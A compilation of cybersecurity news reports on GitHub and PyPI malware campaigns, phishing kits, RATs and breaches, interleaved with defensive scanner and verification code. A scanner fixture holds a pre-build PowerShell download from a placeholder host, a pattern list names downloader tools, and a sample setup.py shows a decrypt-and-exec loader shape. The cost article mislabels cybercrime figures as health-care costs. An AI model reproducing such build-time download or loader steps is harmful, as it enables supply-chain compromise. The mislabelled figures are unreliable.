
Hackers Use GitHub Search to Deliver Malware

Checkmarx, an application security firm, has discovered that threat actors are altering GitHub search results in order to infect developers with persistent malware.

As part of the campaign, attackers were seen developing fake repositories with popular names and themes, and then boosting their search ranks using automatic updates and fake ratings. 

To avoid detection, the threat actors concealed a harmful payload within Visual Studio project files, resulting in the execution of malware similar to Keyzetsu clipper that targets crypto wallets. The malware is installed continuously on Windows machines and is scheduled to be executed daily. 

The threat actors were observed leveraging GitHub Actions to automatically update the malicious repositories by making minor changes to a file titled 'log', which artificially enhances the repositories' visibility and the possibility of users accessing them. 

Furthermore, the attackers were detected adding fictitious stars to their repositories from various fake identities, tricking users into believing the repositories are popular and genuine. 

“Unsuspecting users, often drawn to the top search results and repositories with seemingly positive engagement, are more likely to click on these malicious repositories and use the code or tools they provide, unaware of the hidden dangers lurking within,” Checkmarx stated. 

The attackers inserted their malicious payload in a Visual Studio project file's pre-build event, causing it to be run automatically across the build process. The payload downloads additional content from certain URLs based on the victim's country, downloads encrypted files from the URLs, extracts and runs their content, and checks the system's IP address to see if it is in Russia. 
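A defender-side check for the technique described above: a scanner that pulls every pre-build, post-build and `Exec` step out of a Visual Studio project file and flags commands that fetch or decode remote content. This is an added example, not Checkmarx's tooling; the sample project file, its URL and the pattern list are constructed for illustration.

```python
"""Flag Visual Studio project files whose build events run network-capable commands."""
import re
import xml.etree.ElementTree as ET

# Things a build step should not normally contain: downloaders, encoded PowerShell,
# raw URLs and task-scheduler calls. Constructed list; extend it for your environment.
SUSPICIOUS = [
    re.compile(p, re.IGNORECASE)
    for p in (
        r"\bInvoke-WebRequest\b|\biwr\b|\bcurl\b|\bwget\b|\bbitsadmin\b|\bcertutil\b",
        r"-enc(odedcommand)?\b|\bFromBase64String\b",
        r"https?://",
        r"\bschtasks\b",
    )
]


def _localname(tag: str) -> str:
    """Strip the MSBuild XML namespace from an element tag."""
    return tag.rsplit("}", 1)[-1]


def find_build_events(xml_text: str) -> list[tuple[str, str]]:
    """Return (event_kind, command) for every build event in the project file.

    Classic projects use <PreBuildEvent>/<PostBuildEvent> inside <PropertyGroup>;
    SDK-style projects use <Exec Command="..."/> inside a <Target>.
    """
    root = ET.fromstring(xml_text)
    events = []
    for el in root.iter():
        name = _localname(el.tag)
        if name in ("PreBuildEvent", "PostBuildEvent") and (el.text or "").strip():
            events.append((name, el.text.strip()))
        elif name == "Exec" and el.get("Command"):
            events.append(("Exec", el.get("Command").strip()))
    return events


def scan_project(xml_text: str) -> list[dict]:
    """Return one finding per build event that matches a suspicious pattern."""
    findings = []
    for kind, cmd in find_build_events(xml_text):
        hits = [p.pattern for p in SUSPICIOUS if p.search(cmd)]
        if hits:
            findings.append({"event": kind, "command": cmd, "matched": hits})
    return findings


# Constructed sample: a pre-build event that downloads a file before compilation,
# next to an ordinary post-build copy step that should not be flagged.
SAMPLE_CSPROJ = """<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <PreBuildEvent>powershell -Command "Invoke-WebRequest http://placeholder.invalid/update.bin -OutFile $(TEMP)\\u.bin"</PreBuildEvent>
    <PostBuildEvent>copy "$(TargetPath)" "$(SolutionDir)bin\\"</PostBuildEvent>
  </PropertyGroup>
</Project>
"""

if __name__ == "__main__":
    for f in scan_project(SAMPLE_CSPROJ):
        print(f"[{f['event']}] {f['command']}\n    matched: {f['matched']}")
```

Run it over every `*.csproj`/`*.vcxproj` in a checkout before opening the solution; anything that reaches the network from a build event deserves a manual look.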

On April 3, the attackers began utilising a new URL that pointed to an archived executable file. To avoid detection by security solutions, they padded the executable with an abundance of zeros, preventing scanning.

"The results of our analysis of this malware suggest that the malware contains similarities to the 'Keyzetsu clipper' malware, a relatively new addition to the growing list of crypto wallet clippers commonly distributed through pirated software," Checkmarx said in a press release.

A scheduled task that points to an executable file shortcut is one way that malware tries to remain persistent. Several malicious repositories have received complaints from infected users, suggesting that Checkmarx's effort has been successful. 

“In the aftermath of the XZ attack and many other recent incidents, it would be irresponsible for developers to rely solely on reputation as a metric when using open-source code. These incidents highlight the necessity for manual code reviews or the use of specialized tools that perform thorough code inspections for malware,” Checkmarx added.

Counting the Cost: $9.2 Trillion Annual Impact of Cybercrime Looms

According to a new Statista Market Insights report, cybercrime is rising at an unprecedented pace. The report estimates that cyberattacks will cost approximately one-third of the United States' GDP, or about 24 times Apple's annual revenue in 2023. A similar Statista Market Insights study found that cybercrime costs rose by 245% between 2018 and 2020, from $860 billion to $2.95 trillion. 

With the spread of the pandemic, the cost of health care has more than doubled to $5.49 trillion in 2021 and is expected to increase by $1 trillion annually in 2023 to $8.15 trillion. Cybercrime has become one of the world's largest illegal economies, affecting everyday people as well as businesses and governments. Cyberattacks cause financial losses such as ransom payments, loss of productivity, system downtime and data theft, among others. 

Contributing factors

In terms of attack surfaces, IoT devices give cybercriminals an increasingly large attack surface, raising the number of potential victims over time. There is no reason for Mac users to be excluded from this: Jamf's report recorded a 50% increase in new Mac malware families in 2023. 

The number of malware instances within each of these families could be in the hundreds. With the growing number of Mac users, cybercriminals are increasingly interested in the platform as an easy target. It is important to keep in mind that geopolitics plays a significant role in cyberattacks, as many countries use them for strategic advantage, disruption of critical infrastructure, and intelligence gathering.

A heightened escalation in the number of state-sponsored attacks is taking place as a result of the conflicts in Ukraine and Israel. A significant number of cybersecurity jobs have gone unfilled as a result of the current skills shortage. With fewer professionals available, it will be more difficult to monitor and defend against specific threats. 

Moreover, the shortage of skilled professionals increases the workload for existing employees, which can hurt productivity. Further, employees are burning out as a result of their jobs, and threat actors count on this. In the world of ransomware-as-a-service (RaaS), there are very few barriers to entry; it has become very popular thanks to a combination of tough economic conditions, swift financial gains, and the little technical knowledge required. 

Under this model, operators develop the software and affiliates pay to use the pre-built tools and packages to launch attacks on a network. Each affiliate pays a fee for each attack they launch. A ransomware attack can therefore be carried out by non-programmers who lack the skills to develop and deploy their own ransomware. 

There is no shortage of RaaS kits on the dark web, but they aren't always the best. Due to a simple lack of awareness, the risks and consequences of cyberattacks go unrecognised by many individuals and organizations, leaving them vulnerable to cybercrime. Jamf's annual trends report found that 40% of its mobile users and 39% of organizations are running on a device that is known to have vulnerabilities.

In light of recent incidents regarding a popular Apple device management platform, it has become evident that there remains a notable lack of awareness concerning the security measures necessary to protect Mac devices. Ensuring the security of the Mac is imperative in safeguarding against potential threats such as malware and phishing attacks. Here are some essential steps to bolster the security of the Mac: 

1. Keep the device up-to-date: It is crucial to regularly update the Mac's operating system to incorporate the latest security patches. By staying current with updates, users can effectively address known vulnerabilities that may be exploited by malware.

2. Utilize antivirus software: Despite common misconceptions, Macs are not impervious to malware. Therefore, employing reputable antivirus software is highly recommended. Tools such as Malwarebytes offer free applications for individual users, capable of detecting and removing potential threats. Additionally, MacPaw’s CleanMyMac X now features a malware removal tool powered by MoonLock, enhancing protection against malicious software. 

3. Exercise caution when clicking: Email remains a primary vector for malware distribution, with phishing attacks experiencing a significant rise in success rates. According to recent reports, phishing success rates increased from 1% in 2022 to 9% in 2023. Hence, exercising caution and scepticism when interacting with email links and attachments is essential to mitigate the risk of falling victim to such attacks. 

4. Enable a firewall: Enabling the built-in firewall on the Mac is an effective measure to prevent the acceptance of unauthorized connections and services. By managing both incoming and outgoing connections, the firewall helps fortify the device's defences against potential threats. 

5. Use strong, unique passwords: Employing robust and distinctive passwords is imperative for bolstering the security of the Mac. Avoid using easily guessable passwords, such as common phrases or pet names followed by predictable characters. Instead, opt for complex combinations of letters, numbers, and symbols to enhance password strength and resilience against unauthorized access. 

6. Enable disk encryption: Leveraging features such as FileVault, which encrypts all user data stored on the disk in real-time, enhances the security of sensitive information on the Mac. In the event of device loss or theft, disk encryption ensures that the data remains inaccessible to unauthorized individuals, thereby safeguarding privacy and confidentiality. 

7. Limit user privileges: Restricting user privileges is crucial in preventing unauthorized software installations and minimizing the potential impact of malware infections. By limiting user permissions, users can effectively mitigate the risks associated with malicious activities and enhance overall device security. 

In summary, prioritizing the implementation of robust security measures is paramount in safeguarding the Mac against evolving threats. By adopting proactive strategies such as keeping the device updated, utilizing antivirus software, exercising caution when interacting with emails, enabling firewalls, employing strong passwords, enabling disk encryption, and limiting user privileges, users can significantly enhance the security posture of the Mac and protect against potential vulnerabilities and cyber threats.

X's URL Blunder Sparks Security Concerns

X, the social media platform formerly known as Twitter, recently grappled with a significant security flaw within its iOS app. The issue involved an automatic alteration of Twitter.com links to X.com links within Xeets, causing widespread concern among users. While the intention behind this change was to maintain brand consistency, the execution resulted in potential security vulnerabilities.

The flaw originated from a feature that indiscriminately replaced any instance of "Twitter" in a URL with "X," regardless of its context. This meant that legitimate URLs containing the word "Twitter" were also affected, leading to situations where users unknowingly promoted malicious websites. For example, a seemingly harmless link like netflitwitter[.]com would be displayed as Netflix.com but actually redirect users to a potentially harmful site.

The implications of this flaw were significant, as it could have facilitated phishing campaigns or distributed malware under the guise of reputable brands such as Netflix or Roblox. Despite the severity of the issue, X chose not to address it publicly, likely in an attempt to mitigate negative attention.

The glitch persisted for at least nine hours, possibly longer, before it was eventually rectified. Subsequent tests confirmed that URLs are now displaying correctly, indicating that the issue has been resolved. However, it's important to note that the auto-change policy does not apply when the domain is written in all caps.
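The two behaviours described above, reconstructed as an added example (not X's code): the blanket string substitution that turned netflitwitter[.]com into a Netflix-looking label, beside a host-aware rewrite that only rebrands when the link's registrable host really is twitter.com. The all-caps case from the paragraph above is covered too, since `urlsplit` normalises the host.

```python
"""Display-label rewriting of twitter.com links: the naive version beside a safe one."""
from urllib.parse import urlsplit, urlunsplit

BRAND_OLD = ("twitter", "com")
BRAND_NEW = ("x", "com")


def naive_rewrite(url: str) -> str:
    """The flawed logic: replace every 'twitter' in the string with 'x', wherever it
    occurs. It also happens to be case-sensitive, so TWITTER.COM is left untouched."""
    return url.replace("twitter", "x")


def host_aware_rewrite(url: str) -> str:
    """Rebrand only when the host is twitter.com or one of its subdomains; the path,
    query, fragment and any unrelated host are never modified."""
    parts = urlsplit(url)
    host = parts.hostname  # urlsplit lower-cases the host for us
    if not host:
        return url
    labels = host.split(".")
    if tuple(labels[-2:]) != BRAND_OLD:
        return url
    new_host = ".".join(labels[:-2] + list(BRAND_NEW))
    # Preserve userinfo and port if the original netloc carried them.
    userinfo = parts.netloc.rsplit("@", 1)[0] + "@" if "@" in parts.netloc else ""
    port = f":{parts.port}" if parts.port else ""
    return urlunsplit((parts.scheme, userinfo + new_host + port, parts.path, parts.query, parts.fragment))


def display_is_honest(shown: str, target: str) -> bool:
    """A rewritten label is only safe to show if it resolves to the same host as the
    link the click actually follows."""
    return (urlsplit(shown).hostname or "") == (urlsplit(target).hostname or "")


if __name__ == "__main__":
    for u in ("https://netflitwitter.com/login", "https://twitter.com/i/status/1", "HTTPS://TWITTER.COM/u"):
        shown = naive_rewrite(u)
        print(f"{u}\n  naive: {shown}  honest={display_is_honest(shown, u)}\n  safe:  {host_aware_rewrite(u)}")
```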

This incident underscores the importance of thorough testing and quality assurance in software development, particularly for platforms with large user bases. It serves as a reminder for users to exercise caution when clicking on links, even if they appear to be from trusted sources.

To better understand how platforms like X operate and maintain user trust, it's essential to consider the broader context of content personalization. Profiles on X are utilised to tailor content presentation, potentially reordering material to better match individual interests. This customization considers users' activity across various platforms, reflecting their interests and characteristics. While content personalization enhances user experience, incidents like the recent security flaw highlight the importance of balancing personalization with user privacy and security concerns.

The Vulture in Cyberspace: A Threat to Your Finances

In the digital landscape where information flows freely and transactions occur at the speed of light, a new predator has emerged. Aptly named the “Vulture,” this cyber threat silently circles its unsuspecting prey, waiting for the right moment to strike. Its target? Your hard-earned money, nestled securely within your bank account.

The Anatomy of the Vulture

The Vulture is not a physical bird of prey; it’s a sophisticated malware strain that infiltrates financial systems with surgical precision. Unlike its noisy counterparts, this digital menace operates silently, evading detection until it’s too late. Let’s dissect its anatomy:

Infiltration: The Vulture gains access through phishing emails, compromised websites, or infected software updates. Once inside, it nests within your device, waiting for the opportune moment.

Observation: Like a patient hunter, the Vulture observes your financial behavior. It tracks your transactions, monitors your balance, and studies your spending patterns. It knows when you receive your paycheck, pay bills, or indulge in online shopping.

Precision Attacks: When the time is right, the Vulture strikes. It initiates fraudulent transactions, transfers funds to offshore accounts, or even empties your entire balance. Its precision is chilling—no clumsy mistakes, just calculated theft.

The Revelation

The recent exposé by The Economic Times sheds light on the Vulture’s activities. According to cybersecurity researchers, this malware strain has targeted thousands of unsuspecting victims worldwide. Its modus operandi is both ingenious and terrifying:

Social Engineering: The Vulture exploits human vulnerabilities. It sends seemingly innocuous emails, masquerading as legitimate institutions. Clicking on a harmless-looking link is all it takes for the Vulture to infiltrate.

Zero-Day Vulnerabilities: The malware exploits unpatched software vulnerabilities. It thrives on the negligence of users who delay updates or ignore security warnings.

Money Mule Networks: The stolen funds don’t vanish into thin air. The Vulture employs intricate money mule networks—a web of unwitting accomplices who launder the money across borders.

Protecting Your Nest Egg

Fear not; there are ways to shield your finances from the Vulture’s talons:

Vigilance: Be wary of unsolicited emails, especially those requesting sensitive information. Verify the sender’s authenticity before clicking any links.

Software Updates: Regularly update your operating system, browsers, and security software. Patch those vulnerabilities before the Vulture exploits them.

Two-Factor Authentication: Enable two-factor authentication for your online accounts. Even if the Vulture cracks your password, it won’t get far without the second factor.

Monitor Your Accounts: Keep a hawk eye on your bank statements. Report any suspicious activity promptly.

Moving Ahead

The Vulture may be cunning, but we can outsmart it. By staying informed, adopting best practices, and maintaining digital hygiene, we can protect our nest eggs from this relentless predator. Remember, in cyberspace, vigilance is our armor, and knowledge is our shield.

Lazy Koala: New Cyber Threat Emerges in CIS Region

Cybersecurity researchers at Positive Technologies Expert Security Center (PT ESC) recently uncovered a new threat actor they've named Lazy Koala. Despite lacking sophistication, this group has managed to achieve significant results.

The report reveals that Lazy Koala is targeting enterprises primarily in Russia and six other Commonwealth of Independent States countries: Belarus, Kazakhstan, Uzbekistan, Kyrgyzstan, Tajikistan, and Armenia. Their victims belong to government agencies, financial institutions, and educational establishments. Their primary aim is to acquire login credentials for various services.

According to the researchers, nearly 900 accounts have been compromised so far. The purpose behind the stolen information remains unclear, but it's suspected that it may either be sold on the dark web or utilized in more severe subsequent attacks.

The modus operandi of Lazy Koala involves simple yet effective tactics. They employ convincing phishing attacks, often using native languages to lure victims into downloading and executing attachments. These attachments contain a basic password-stealing malware. The stolen files are then exfiltrated through Telegram bots, with the individual managing these bots being dubbed Koala, hence the group's name.

Denis Kuvshinov, Head of Threat Analysis at PT ESC, describes Lazy Koala's approach as "harder doesn't mean better." Despite their avoidance of complex tools and tactics, they manage to accomplish their objectives. Once the malware establishes itself on a device, it utilizes Telegram, a preferred tool among attackers, to exfiltrate stolen data.

PT ESC has notified the victims of these attacks, warning that the stolen information is likely to be sold on the dark web.

Are YouTube Game Cracks Hiding Malware?

Recently, cybersecurity researchers have unearthed a disturbing trend: threat actors are exploiting YouTube to distribute malware disguised as video game cracks. This alarming course of action poses a significant risk to unsuspecting users, especially those seeking free software downloads.

According to findings by Proofpoint Emerging Threats, cybercriminals are leveraging popular video-sharing platforms to target home users, who often lack the robust defences of corporate networks. The plan of action involves creating deceptive videos offering free access to software and video game enhancements, but the links provided lead to malicious content.

The malware, including variants such as Vidar, StealC, and Lumma Stealer, is camouflaged within seemingly innocuous downloads, enticing users with promises of game cheats or software upgrades. What's particularly troubling is the deliberate targeting of younger audiences, with malicious content masquerading as enhancements for games popular among children.

The investigation uncovered several compromised YouTube accounts, with previously dormant channels suddenly flooded with English-language videos promoting cracked software. These videos, uploaded within a short timeframe, contained links to malware-infected files hosted on platforms like MediaFire and Discord.

One example highlighted by researchers featured a video claiming to enhance a popular game, accompanied by a MediaFire link leading to a password-protected file harbouring Vidar Stealer malware. Similarly, other videos promised clean files but included instructions on disabling antivirus software, further endangering unsuspecting users.

Moreover, cybercriminals exploited the identity of "Empress," a well-known entity within software piracy communities, to disseminate malware disguised as cracked game content. Visual cues provided within the videos streamlined the process of installing Vidar Stealer malware, presenting it as authentic game modifications.

Analysis of the malware revealed a common tactic of bloating file sizes to evade detection, with payloads expanding to approximately 800 MB. Furthermore, the malware utilised social media platforms like Telegram and Discord for command and control (C2) activities, complicating detection efforts.

Research into the matter has again underscored the need for heightened awareness among users, particularly regarding suspicious online content promising free software or game cheats. While YouTube has been proactive in removing reported malicious accounts, the threat remains pervasive, targeting non-enterprise users vulnerable to deceptive tactics.

As cybercriminals continue to refine their methods, it's imperative for individuals to exercise caution when downloading software from unverified sources. Staying informed about emerging threats and adopting cybersecurity best practices can help reduce the risk of falling victim to such schemes.

Linux Servers Targeted by DinodasRAT Malware

Recently, cybersecurity experts have noticed a concerning threat to Linux servers worldwide. Known as DinodasRAT (also referred to as XDealer), this malicious software has been identified targeting systems running Red Hat and Ubuntu operating systems. The campaign, suspected to have been operational since 2022, signifies a growing concern for server security.

While the Linux variant of DinodasRAT has been detected, details about its operation remain limited. However, previous versions have been traced back to 2021, indicating a persistent threat. Notably, DinodasRAT has previously targeted Windows systems in a campaign dubbed 'Operation Jacana,' focusing on governmental entities.

Trend Micro reported on the activities of a Chinese APT group identified as 'Earth Krahang,' utilising XDealer to breach both Windows and Linux systems of governmental organisations globally. This revelation underlines the severity and scope of the threat posed by DinodasRAT.

According to insights provided by Kaspersky researchers, the Linux version of DinodasRAT exhibits sophisticated behaviour upon execution. It establishes persistence on the infected device through SystemV or SystemD startup scripts and creates a hidden file acting as a mutex to prevent multiple instances from running simultaneously. Furthermore, the malware communicates with a command and control (C2) server via TCP or UDP, ensuring secure data exchange through encryption algorithms.

DinodasRAT possesses a range of capabilities designed to monitor, control, and exfiltrate data from compromised systems. These include tracking user activities, executing commands from the C2 server, managing processes and services, offering remote access to the attacker, proxying communications, downloading updates, and self-uninstallation to erase traces of its presence.

Kaspersky researchers emphasise that DinodasRAT provides threat actors with complete control over compromised systems, enabling data exfiltration and espionage. The malware primarily targets Linux servers, with affected victims identified in China, Taiwan, Turkey, and Uzbekistan since October 2023.

Despite the severity of the threat, details regarding the initial infection method remain undisclosed. Nevertheless, the sudden rise of DinodasRAT underscores the need for robust cybersecurity measures, especially for organisations relying on Linux servers for critical operations.

As cybersecurity experts continue to monitor and analyse this surge in emerging threats, proactive measures such as regular system updates, network monitoring, and employee training on security best practices become increasingly crucial in safeguarding against sophisticated threats like DinodasRAT. 

PyPI Halts New User Registrations to Combat Malware Campaign

The Python Package Index (PyPI) has implemented a temporary halt on user registrations and the creation of new projects due to an ongoing malware scheme. PyPI serves as a central hub for Python projects, aiding developers in discovering and installing Python packages.

With a vast array of packages available, PyPI becomes an attractive target for malicious actors who often upload counterfeit or fraudulent packages, posing risks to software developers and potentially initiating supply-chain attacks. Consequently, PyPI administrators recently announced the suspension of new user registrations to address this malicious activity.

According to a report by Checkmarx, cyber threat actors began uploading 365 packages to PyPI, masquerading as legitimate projects. These packages contain malicious code within their 'setup.py' files, which triggers upon installation, attempting to retrieve additional harmful payloads from remote servers.

To avoid detection, the malicious code is encrypted using the Fernet module, and the remote server's URL is generated dynamically as required. The ultimate payload includes an information-stealing mechanism with persistence capabilities, targeting data stored in web browsers such as login credentials, cookies, and cryptocurrency extensions.
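A static triage check for the install-time pattern described above (a Fernet-encrypted blob decrypted and executed from `setup.py`, with a network fetch for the next stage). This is an added example, not Checkmarx's or PyPI's tooling; both sample `setup.py` files are constructed, and the suspect one holds placeholder strings only, no key or payload.

```python
"""Triage a package's setup.py for install-time loader behaviour using the ast module."""
import ast

NETWORK_MODULES = {"urllib", "requests", "http.client", "socket"}
CRYPTO_MODULES = {"cryptography"}          # covers cryptography.fernet as a submodule
DYNAMIC_EXEC = {"exec", "eval"}


class _Collector(ast.NodeVisitor):
    """Records imports and dynamic-execution calls that would run at install time."""

    def __init__(self) -> None:
        self.imports: set[str] = set()
        self.dynamic_calls: list[int] = []   # line numbers of exec()/eval() calls

    def visit_Import(self, node: ast.Import) -> None:
        for alias in node.names:
            self.imports.add(alias.name)
        self.generic_visit(node)

    def visit_ImportFrom(self, node: ast.ImportFrom) -> None:
        if node.module:
            self.imports.add(node.module)
        self.generic_visit(node)

    def visit_Call(self, node: ast.Call) -> None:
        func = node.func
        name = func.id if isinstance(func, ast.Name) else getattr(func, "attr", None)
        if name in DYNAMIC_EXEC:
            self.dynamic_calls.append(node.lineno)
        self.generic_visit(node)


def _module_matches(imports: set[str], wanted: set[str]) -> bool:
    """True if any import equals a wanted module or is one of its submodules."""
    return any(m == w or m.startswith(w + ".") for m in imports for w in wanted)


def triage_setup_py(source: str) -> dict:
    """Return the indicators found plus a verdict. exec()/eval() inside setup.py is
    unusual on its own; together with crypto and network imports it matches the
    campaign's loader shape closely enough to block pending manual review."""
    c = _Collector()
    c.visit(ast.parse(source))
    indicators = {
        "dynamic_exec_lines": c.dynamic_calls,
        "imports_crypto": _module_matches(c.imports, CRYPTO_MODULES),
        "imports_network": _module_matches(c.imports, NETWORK_MODULES),
    }
    score = bool(c.dynamic_calls) + indicators["imports_crypto"] + indicators["imports_network"]
    indicators["verdict"] = "block" if score >= 2 else ("review" if score == 1 else "clean")
    return indicators


# Constructed sample: the shape of an install-time loader, placeholders only.
SUSPECT_SETUP_PY = '''
from setuptools import setup
from cryptography.fernet import Fernet
import urllib.request

KEY = b"<placeholder-key>"
BLOB = b"<placeholder-ciphertext>"
exec(Fernet(KEY).decrypt(BLOB))       # executes whatever the blob decrypts to

setup(name="examplepkg", version="1.0.0")
'''

# Constructed sample: an ordinary package with nothing dynamic at install time.
BENIGN_SETUP_PY = '''
from setuptools import setup, find_packages
setup(name="examplepkg", version="1.0.0", packages=find_packages())
'''

if __name__ == "__main__":
    print("suspect:", triage_setup_py(SUSPECT_SETUP_PY))
    print("benign: ", triage_setup_py(BENIGN_SETUP_PY))
```

Note that a scanner like this only sees `setup.py`; wheels and `pyproject.toml` build hooks need the same treatment, and obfuscated code that builds `exec` via `getattr` will not match the name check.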

Checkmarx has published a comprehensive list of identified malicious entries, featuring numerous typosquatting variants of genuine packages. However, Check Point researchers reveal that the list of malicious packages exceeds 500 and was deployed in two phases. Each package originated from unique maintainer accounts with distinct names and email addresses.

The researchers note that each maintainer account uploaded only one package, suggesting the use of automation in orchestrating the attack. All entries shared the same version number, contained identical malicious code, and displayed randomly generated names.

This incident underscores the critical importance for software developers and package maintainers to rigorously verify the authenticity and security of components sourced from open-source repositories. Notably, this is not the first time PyPI has taken aggressive measures to protect its community from malicious submissions. Similar actions were taken on May 20 last year.

'Tycoon' Malware Kit Bypasses Microsoft and Google Multifactor Authentication

An emerging phishing kit called "Tycoon 2FA" is gaining widespread use among threat actors, who are employing it to target Microsoft 365 and Gmail email accounts. This kit, discovered by researchers at Sekoia, has been active since at least August and received updates as recently as last month to enhance its evasion techniques against multifactor authentication (MFA).

According to the researchers, Tycoon 2FA is extensively utilized in various phishing campaigns, primarily aimed at harvesting Microsoft 365 session cookies to bypass MFA processes during subsequent logins. The platform has amassed over 1,100 domain names between October 2023 and late February, with distribution facilitated through Telegram channels under different handles such as Tycoon Group, SaaadFridi, and Mr_XaaD.

Operating as a phishing-as-a-service (PhaaS) platform, Tycoon 2FA offers ready-made phishing pages for Microsoft 365 and Gmail accounts, along with attachment templates, starting at $120 for 10 days, with prices varying based on the domain extension. Transactions are conducted via Bitcoin wallets managed by the "Saad Tycoon Group," suspected to be the operator and developer of Tycoon 2FA, with over 1,800 recorded transactions as of mid-March.

The phishing technique employed by Tycoon 2FA involves an adversary-in-the-middle (AitM) approach, utilizing a reverse proxy server to host phishing webpages. This method intercepts user inputs, including MFA tokens, allowing attackers to bypass MFA even if credentials are changed between sessions.

Despite the security enhancements provided by MFA, sophisticated attacks like Tycoon 2FA pose significant threats by exploiting AitM techniques. The ease of use and relatively low cost of Tycoon 2FA make it appealing to threat actors, further compounded by its stealth capabilities that evade detection by security products.

Sekoia researchers outlined a six-stage process used by Tycoon 2FA to execute phishing attacks, including URL redirections, Cloudflare Turnstile challenges, JavaScript execution, and the presentation of fake authentication pages to victims.

The emergence of Tycoon 2FA underscores the evolving landscape of phishing attacks, challenging the effectiveness of traditional MFA methods. However, security experts suggest that certain forms of MFA, such as security keys implementing WebAuthn/FIDO2 standards, offer higher resistance against phishing attempts.
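Why a WebAuthn/FIDO2 key holds up where a relayed TOTP code or session cookie does not: the relying party verifies the origin and RP ID hash that the browser, not the page, bound into the assertion, so an adversary-in-the-middle proxy cannot present the user's response as its own. This is an added illustration, not taken from Sekoia's report; the RP ID, origins and proxy domain are placeholders, and the signature check is described in a comment rather than implemented.

```python
"""WebAuthn assertion checks that defeat an adversary-in-the-middle (AitM) proxy."""
import base64
import hashlib
import json
import secrets

RP_ID = "login.example"                               # assumed relying party ID
EXPECTED_ORIGIN = "https://login.example"             # the only origin the RP accepts
PROXY_ORIGIN = "https://login-example.phish.invalid"  # placeholder AitM reverse proxy


def b64url(data: bytes) -> str:
    """Base64url without padding, as WebAuthn encodes the challenge."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def browser_client_data(challenge: bytes, page_origin: str) -> bytes:
    """clientDataJSON as the browser builds it. The origin field comes from the page's
    actual origin; script on the page cannot set it to something else."""
    return json.dumps(
        {"type": "webauthn.get", "challenge": b64url(challenge), "origin": page_origin}
    ).encode()


def authenticator_data(rp_id: str) -> bytes:
    """authenticatorData prefix: SHA-256(rpId) || flags || signCount. A browser only
    lets a page use an rpId that is a registrable suffix of its own host, so a proxy on
    phish.invalid cannot ask the key to act for login.example (and the key would hold
    no credential for that rpId anyway)."""
    flags = b"\x05"                        # UP (user present) | UV (user verified)
    sign_count = (1).to_bytes(4, "big")
    return hashlib.sha256(rp_id.encode()).digest() + flags + sign_count


def rp_verify(client_data: bytes, auth_data: bytes, expected_challenge: bytes) -> tuple[bool, str]:
    """The relying party's checks on an assertion, minus the signature step. A real RP
    also verifies the credential's signature over auth_data || SHA-256(client_data);
    that signature is what stops the proxy from simply editing the origin field."""
    cd = json.loads(client_data)
    if cd.get("type") != "webauthn.get":
        return False, "unexpected ceremony type"
    if cd.get("challenge") != b64url(expected_challenge):
        return False, "challenge mismatch"
    if cd.get("origin") != EXPECTED_ORIGIN:
        return False, f"origin mismatch: {cd.get('origin')!r}"
    if auth_data[:32] != hashlib.sha256(RP_ID.encode()).digest():
        return False, "rpIdHash mismatch"
    return True, "ok"


def legitimate_login() -> tuple[bool, str]:
    """User on the genuine site: origin and rpIdHash both match."""
    challenge = secrets.token_bytes(32)
    cd = browser_client_data(challenge, EXPECTED_ORIGIN)
    return rp_verify(cd, authenticator_data(RP_ID), challenge)


def proxied_login() -> tuple[bool, str]:
    """User on the AitM proxy page. The proxy relays the RP's real challenge unchanged,
    but the browser records the proxy's origin and the key signs for the proxy's rpId."""
    challenge = secrets.token_bytes(32)
    proxy_host = PROXY_ORIGIN.removeprefix("https://")
    cd = browser_client_data(challenge, PROXY_ORIGIN)
    return rp_verify(cd, authenticator_data(proxy_host), challenge)


if __name__ == "__main__":
    print("legitimate:", legitimate_login())
    print("via proxy: ", proxied_login())
```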

To assist organizations in identifying Tycoon 2FA activities, Sekoia has published a list of indicators of compromise (IoCs) on GitHub, including URLs associated with Tycoon 2FA phishing campaigns.

Is Your Data Safe? Fujitsu Discovers Breach, Customers Warned

Fujitsu, a leading Japanese technology company, recently faced a grave cybersecurity breach when it discovered malware on some of its computer systems, potentially leading to the theft of customer data. This incident raises concerns about the security of sensitive information stored by the company.

With a workforce of over 124,000 and an annual revenue of $23.9 billion, Fujitsu operates globally, providing a wide range of IT services and products, including servers, software, and telecommunications equipment. The company has a strong presence in over 100 countries and maintains crucial ties with the Japanese government, participating in various public sector projects and national security initiatives.

The cybersecurity incident was disclosed in a recent announcement on Fujitsu's news portal, revealing that the malware infection compromised several business computers, possibly allowing hackers to access and extract personal and customer-related information. In response, Fujitsu promptly isolated the affected systems and intensified monitoring of its other computers while continuing to investigate the source and extent of the breach.

Although Fujitsu has not received reports of customer data misuse, it has taken proactive measures by informing the Personal Information Protection Commission and preparing individual notifications for affected customers. The company's transparency and swift action aim to mitigate potential risks and restore trust among stakeholders.

This is not the first time Fujitsu has faced cybersecurity challenges. In May 2021, the company's ProjectWEB tool was exploited, resulting in the theft of email addresses and proprietary data from multiple Japanese government agencies. Subsequent investigations revealed vulnerabilities in ProjectWEB, leading to its discontinuation and replacement with a more secure information-sharing tool.

Fujitsu's response to the recent breach highlights the urgency of safeguarding sensitive data in these circumstances. The company's commitment to addressing the issue and protecting customer information is crucial in maintaining trust and credibility in the digital age.

As Fujitsu continues to investigate the incident, it remains essential for customers and stakeholders to remain careful and implement necessary precautions to mitigate potential risks. The company's efforts to enhance security measures and improve transparency are essential steps towards preventing future breaches and ensuring the integrity of its services and systems.

Cyber Attacks Threaten Essential Services

As per a recent report by BlackBerry, it was revealed that critical infrastructure providers faced a surge in cyberattacks during the latter part of 2023. Shockingly, these providers bore the brunt of 62% of all industry-related cyberattacks tracked from September through December. What’s more concerning is the 27% increase in the use of novel malware during this period, indicating a deliberate effort by threat actors to circumvent traditional defense mechanisms. With over 5,300 unique malware samples targeting BlackBerry’s customers daily, the urgency for enhanced cybersecurity measures becomes evident.

Threat actors are not only leveraging novel malware but also exploiting critical vulnerabilities in widely used products such as Citrix Netscaler, Cisco Adaptive Security Appliance, and JetBrains TeamCity. By exploiting these vulnerabilities, threat groups can infiltrate targeted organisations, posing a substantial risk to their operations. Additionally, VPN appliances remain highly attractive targets for state-linked threat actors, further stressing the need for heightened security measures across all sectors.

